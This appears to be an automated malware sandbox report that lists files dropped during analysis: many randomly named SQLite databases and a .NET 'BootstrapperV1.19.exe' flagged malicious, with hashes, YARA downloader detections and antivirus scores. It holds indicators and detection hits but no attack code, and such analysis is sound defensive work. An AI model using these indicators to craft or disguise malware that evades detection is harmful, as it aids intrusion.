File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B3cBF1HHLo

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

Download File

Process:	C:\Users\user\Desktop\BootstrapperV1.19.exe
File Type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	995840
Entropy (8bit):	5.630174987352983
Encrypted:	false
SSDEEP:	24576:DIbp4sZotkNjFC/4qxp+k+kPFoHZvPrSMc:cvotkNjg/lhqZvG
MD5:	90FD25CED85FE6DB28D21AE7D1F02E2C
SHA1:	E27EFF4CD4D383F5C564CCE2BD1AAA2FFE4EC056
SHA-256:	97572BD57B08B59744E4DFE6F93FB96BE4002DFE1AA78683771725401776464F
SHA-512:	1C775CF8DFDE037EAA98EB14088C70D74923F0F6A83030A71F2F4C1A4453F6154DAB7A4AA175E429860BADDA3E5E0AE226F3C3E8171332F5962BF36F8AA073FA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...an.f.........."......(..........rF... ....@...... ....................................`..................................................F..T....`..u............................................................................F............... ..H............text....&... ...(.................. ..`.rsrc...u....`.....................@..@.reloc...............0..............@..BH........P..\............................................................0...........(....r...p(....s......r...po.....sq......o.....ow...o....r...po....9,....ow...rD..poj.....9.....rp..pr\|..po2..............9.....o..........&......r\|..p.....s........o......r~..p~....r...p(....o......r...po.............9......o..........&..........:......r\|..p(....98....s........r...po.............9......o..........&........r...p(....9....r...p(......(....9....r...p..(....s........o......r~..p~....r.

C:\Users\user\AppData\Local\Temp\BpuRgsCFWs

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BricMQqhKM

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C0OEKqFQZl

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C1DemE7p3b

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CDgiZYJli3

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CVlB20pq1i

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CcnwVpj1cX

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CwI32H9nP8

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DFRmwrvrYw

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\De27O6S5og

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EBQC0Tom9o

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EMrbdY0kw0

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FUMgEp3RrB

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Fns5fiwx9N

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FucGh6K2RZ

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FzkKFEDTD0

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\G5bvdcAC5O

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GIkaeJJrLZ

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GmGNHGas0N

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GrFYDEvPCN

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GvOu8x04pN

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HKVBG1YPQH

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HaZBD8KMZB

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
